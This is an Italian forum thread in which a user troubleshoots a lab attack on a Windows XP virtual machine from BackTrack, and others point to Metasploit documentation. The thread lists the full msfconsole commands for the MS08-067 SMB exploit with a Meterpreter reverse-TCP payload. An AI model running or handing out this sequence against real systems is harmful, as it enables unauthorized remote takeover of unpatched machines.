non e' che puoi fare le cose a caso, non tutti i sistemi sono "sempre e comunque" penetrabili con metasploit.
credo che ti convnga dare un occhio a un po' di documentazione.
Salve a tutti,
ho come sistema operativo principale ubuntu con su due macchine virtuali: backtrack, windows xp sp3. Penetrando il sistema windows xp sp3 con metasploit di backtrack, mi da questo errore :
exploit[*] Started bind handler
[-] Exploit exception: The connection was refused by the remote host (13.0.2.45(numero inventato):445).[*] Exploit completed, but no session was created.
Sapete qual'è il problema? Windows firewall l'ho già disattivato ma mi da lo stesso errore.
Ho seguito questa linea di comandi.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.151
msf exploit(ms08_067_netapi) > set LPORT 4444
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > exploit
Premetto già che entrambi gli OS (backtrack,windows) hanno gli stessi ip. Non sarà quello il problema?
non e' che puoi fare le cose a caso, non tutti i sistemi sono "sempre e comunque" penetrabili con metasploit.
credo che ti convnga dare un occhio a un po' di documentazione.
ho capito quindi è un problema di ip .Userò il notebook allora...
Grazie.
nn c'è guida migliore di questa
Code:http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
ok grazie, le avevo già letto queste guide ma non ci ho fatto molto caso ,la leggo meglio adesso.
Brigante grazie infinite sono riuscito nella penetrazione era un problema di ip..
Salve alla prossima